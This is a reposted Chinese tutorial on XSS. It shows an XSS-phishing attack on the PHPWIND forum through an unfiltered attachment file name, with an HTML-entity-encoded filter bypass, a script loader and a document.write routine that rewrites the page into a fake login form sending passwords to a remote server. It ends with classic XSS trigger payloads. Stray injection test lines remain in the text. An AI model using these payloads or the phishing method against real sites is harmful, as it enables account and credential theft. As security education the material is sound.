【转】XSS跨站脚本攻击原理

【转】XSS跨站脚本攻击原理

最近跨站脚本漏洞好像比较火，国内的一些比较出名的WEB程序都陆续暴出了跨站脚本漏洞，但是一提到跨站脚本漏洞的攻击方式大家都哑火了，因为在常规的概念中这种漏洞最多是挂网页木马，获取COOKIE之类，属于典型的鸡肋漏洞！

       跨站脚本攻击最大的魅力是通过HTML注入劫持用户的浏览器，任意构造用户当前浏览的HTML内容，甚至可以模拟用户当前的操作。我这里介绍一种新式攻击方法：XSS Phishing（跨站脚本钓鱼攻击），利用这种方式可以直接盗取用户的密码，下面我就拿最近PHPWIND论坛所暴出的XSS做一下演示，PHPWIND对上传文件名没有处理严格，导致可以写入跨站脚本。

       先做一个简单的测试，发一篇新帖，在附件中随意写入一个本地路径加带“<” 和“>”的文件名，如图一

       发帖成功后我们会发现，帖子附件名已经没有了，如图二

       我们查看当前页面的源代码会发现<xss>已经写到页面内，如图三

       当然要写入脚本，PHPWIND还是做了限制，文件名中出现"(","/"字符将会被过滤，不过可以利用HTML转码的方式绕过这个限制，如<TABLE BACKGROUND=javscript:alert(/xss/)>转换成

       <TABLE BACKGROUND=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#47&#120&#115&#115&#47&#41>

       这样我们已经实现了跨站脚本的写入，关键是怎么实现攻击，这一处跨站脚本漏洞进行了HTML转码，我们不方便写入过长的内容，那么就加载一个JS文件，动态创建一个script标记，代码如下：

       <TABLE BACKGROUND=javascript:s=document.createElement("script");s.src=");>

       OK,到了这一步我们就可以在JS中任意构造我们的攻击代码，攻击的思路是当用户访问帖子，利用脚本清空当前页面，然后重新写成钓鱼页面。

     首先我们可以实验一下，javacript有一个小特性,延时输出将会清空当前页面所有的内容，代码如下：

       function Phish(){
       info = "我是来钓鱼的！"
       document.write(info);
       }
       function doit(){
       setTimeout("Phish()", 1000 );
       }doit()

       如图四，帖子页面的代码和内容全变成了“我是来钓鱼的！”

       想一想，如果我们把info变量的内容变成HTML代码会怎样，如图五

       嘿嘿，邪恶一点！我们完全可以把页面变成一个自己操纵的登录页面，将表单的值指向远程服务器上的程序，如图六

       然后远程服务器上的程序将接受表单POST的用户和密码，当然我们可以做巧妙点，让其访问后又转跳回论坛首页，代码如下：

       最后我们便完成了钓鱼的过程，管理员访问我们的帖子，马上重写当前页面，设置一个重新登录的陷阱，盗取用户名和密码，全部过程只在没有察觉的一瞬间.

       这类攻击方式危害很大，文中的原始代码只是描叙一下思路，有很多破绽，当然如果你够邪恶的话，完全可以自己重写代码，钓鱼于无形之中。

       提醒一下，跨站脚本不仅仅是简单的挂马，XSS Phishing（跨站脚本钓鱼攻击）只是一个简单的开始！

       有关XSS跨站攻击的基本概念及防范的方法，请读者参考以下文章： 
       浅析XSS(Cross Site Script)漏洞原理
    http://publish.it168.com/2007/0704/20070704004201.shtml

<a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#50&#51&#52&#53&#41>TEST</a>

TEST11111111111111111111111111111111111111111

 【IT168 专稿】最近一些人频频在博客里炫耀说黑了某某门户网站，发现了某某大站的漏洞，竟然还要收取发现漏洞的费用，仔细瞧了一瞧，全是一片噼里啪啦alert消息框的截图，只是简单的触发了XSS，心痒难耐，于是写了这篇拙文道出我对跨站脚本漏洞原理的一些理解。

    如果你还不知道什么是XSS，我来帮助解释一下，XSS的全称是Cross Site Scripting，意思是跨站脚本.这第一个单词是Cross，为什么缩写成X呢？因为CSS是层叠样式表的缩写（Cascading Style Sheets）的缩写，同时Cross发音和X相似，为了避免混淆用X来代替,缩写成XSS。其实我觉得叫XSS挺合适的，因为现在流行AJAX嘛，新的跨站脚本攻击技术很多都是和XMLHTTP控件无间配合，嘿嘿，这个是题外话，我们只讲原理，下面我就分两个部分分析XSS原理：

    一、XSS的触发条件

    了解XSS的触发条件就先得从HTML（超文本标记语言）开始，我们浏览的网页全部都是基于超文本标记语言创建的，如显示一个超链接：

    <A HREF="http://safe.it168.com">IT168安全频道</A>

    而XSS的原理也就是往HTML中注入脚本，HTML指定了脚本标记<script></script>.在没有过滤字符的情况下，只需要保持完整无错的脚本标记即可触发XSS，假如我们在某个资料表单提交内容,表单提交内容就是某个标记属性所赋的值，我们可以构造如下值来闭和标记来构造完整无错的脚本标记，

    "><script>alert('XSS');</script><"

    结果形成了<A HREF=""><script>alert('XSS');</script> <"">茄子宝的博客在这里</A>这样一个标记，：）这里和SQL注入很象！

    测试闭和表单赋值所在的标记，形成完整无错的脚本标记可触发XSS，但是没有脚本标记怎么触发XSS呢？呵呵，我们只好利用其他标记了，假如要在网页里显示一张图片，那么就要使用一个<img>标记，示例如下：

    <img src=" http://safe.it168.com /xss.gif">

    img标记并不是真正地把图片给加入到Html文档把两者合二为一，而是通过src属性赋值。那么浏览器的任务就是解释这个img标记，访问src属性所赋的值中的URL地址并输出图片。问题来了！浏览器会不会检测src属性所赋的值呢？答案是否！那么我们就可以在这里大做文章了，接触过javascript的同志应该知道，javascript有一个URL伪协议，可以使用“javascript：”这种协议说明符加上任意的javascript代码，当浏览器装载这样的URL时，便会执行其中的代码.于是我们就得出了一个经典的XSS示例：

    <img src="javascript:alert('XSS');"> 如图一

    当然并不是所有标记的属性都能用，细心的你应该发现标记的属性在访问文件才触发的XSS，这里我就不再深入，因为离开标记的属性还有事件能帮助我们触发XSS.那什么是事件呢？只有达到某个条件才会引发事件，正巧img标记有一个可以利用的onerror()事件，当img标记内含有一个onerror()事件而正好图片没有正常输出便会触发这个事件，而事件中可以加入任意的脚本代码，其中的代码也会执行.现在我们又得到了另外一个经典的XSS示例：

<img src=" http://xss.jpg" onerror=alert('XSS')>如图二

    综合这一部分，我们知道XSS的触发条件包括：完整无错的脚本标记，访问文件的标记属性和触发事件。